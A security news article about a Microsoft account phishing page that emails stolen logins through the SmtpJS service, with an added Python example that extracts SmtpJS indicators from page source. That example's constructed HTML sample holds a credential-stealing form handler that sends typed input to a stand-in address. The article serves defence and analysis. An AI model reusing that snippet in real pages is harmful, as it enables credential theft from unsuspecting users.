Microsoft Phishing Page

A new landing page for a Microsoft account phishing scam has been discovered that utilizes the SmtpJS service to send stolen credentials via email to the attacker.

There is nothing special about the appearance of the Microsoft account phishing page shown below that was discovered by MalwareHunterTeam. It's your standard Microsoft login template that will ask you for your Microsoft credentials and then tell you that the submitted credentials are incorrect.

Microsoft Phishing Landing Page

When users submit their credentials in phishing scams like this, the page typically saves them to a database for retrieval later or uses a backend script to send them off to the attacker.

This particular landing page does something different by utilizing the SmtpJS service to send an email to the attacker via JavaScript.

For security researchers and analysts, the advantage to this is that they can simply view the source for the landing page to see the configuration being used by SmtpJS as shown below.

SmtpJS Script Config

The embedded config includes the sender email address the stolen credentials will be sent as, the address they will be sent to, and the secure token needed to send email via SmtpJS. Using this information, analysts and researchers can potentially link the attacker to other campaigns and make it easier for law enforcement to track them.

This configuration is passed along to smtpjs.com when a user enters their credentials so that it can generate an email to the specified user as shown below.
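To illustrate what an analyst can pull from such a page's source, here is an added Python example (not code from the article or from the phishing kit): it scans a constructed HTML sample for the smtpjs.com script include and the fields passed to SmtpJS's Email.send call. The field names (SecureToken, To, From) follow SmtpJS's public v3 API; the sample page, the addresses and the token value are constructed placeholders.

```python
import re

# Constructed sample of a landing page's source, not the real phishing page;
# the SecureToken and addresses are placeholders, not real values.
SAMPLE_HTML = """<html><head>
<script src="https://smtpjs.com/v3/smtp.js"></script>
</head><body>
<form onsubmit="return sendCreds()"><input id="u"><input id="p"></form>
<script>
function sendCreds() {
  Email.send({
    SecureToken: "PLACEHOLDER-TOKEN-0000",
    To: "drop@example.invalid",
    From: "noreply@example.invalid",
    Subject: "New login",
    Body: "user=" + document.getElementById("u").value
  }).then(function() { alert("Incorrect password"); });
  return false;
}
</script></body></html>"""

# <script ... src="...smtpjs.com..."> includes: the host an admin would block.
SMTPJS_SCRIPT = re.compile(r'<script[^>]+src=["\']([^"\']*smtpjs\.com[^"\']*)["\']', re.I)
# The object literal handed to Email.send(...) (SmtpJS v3 API shape).
EMAIL_SEND = re.compile(r'Email\.send\s*\(\s*\{(.*?)\}\s*\)', re.S)
# One "Key: value," field per line inside that object literal.
FIELD = re.compile(r'^\s*(\w+)\s*:\s*(.+?),?\s*$', re.M)

def _literal(value):
    """Return the string inside a quoted JS literal, or None if the value is an expression."""
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
        return value[1:-1]
    return None

def extract_smtpjs_config(html):
    """Collect the indicators an analyst would record: script hosts and Email.send fields."""
    result = {"script_src": SMTPJS_SCRIPT.findall(html), "configs": []}
    for body in EMAIL_SEND.findall(html):
        cfg = {}
        for key, value in FIELD.findall(body):
            lit = _literal(value)
            # Expressions (e.g. the Body built from form fields) are flagged, not evaluated.
            cfg[key] = lit if lit is not None else "<dynamic: %s>" % value
        result["configs"].append(cfg)
    return result

def is_suspicious(html):
    """True when a page both loads smtpjs.com and sends mail with an embedded token or password."""
    found = extract_smtpjs_config(html)
    return bool(found["script_src"]) and any(
        "SecureToken" in c or "Password" in c for c in found["configs"])
```

The `script_src` entries are the hosts to add to a web filter, and the `To`/`From`/`SecureToken` values are the indicators the article describes for linking campaigns.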

Sending stolen credentials to the attacker

While researchers benefit from the public config used by SmtpJS, system administrators can also benefit by blocking the service on their web filters.

Unless this service is absolutely needed in your organization, you can simply block access to the smtpjs site and phishing pages that utilize it won't be able to receive any submitted credentials.

This is also another example of how understanding the underlying infrastructure of a security threat can better allow system and network administrators to protect their users.
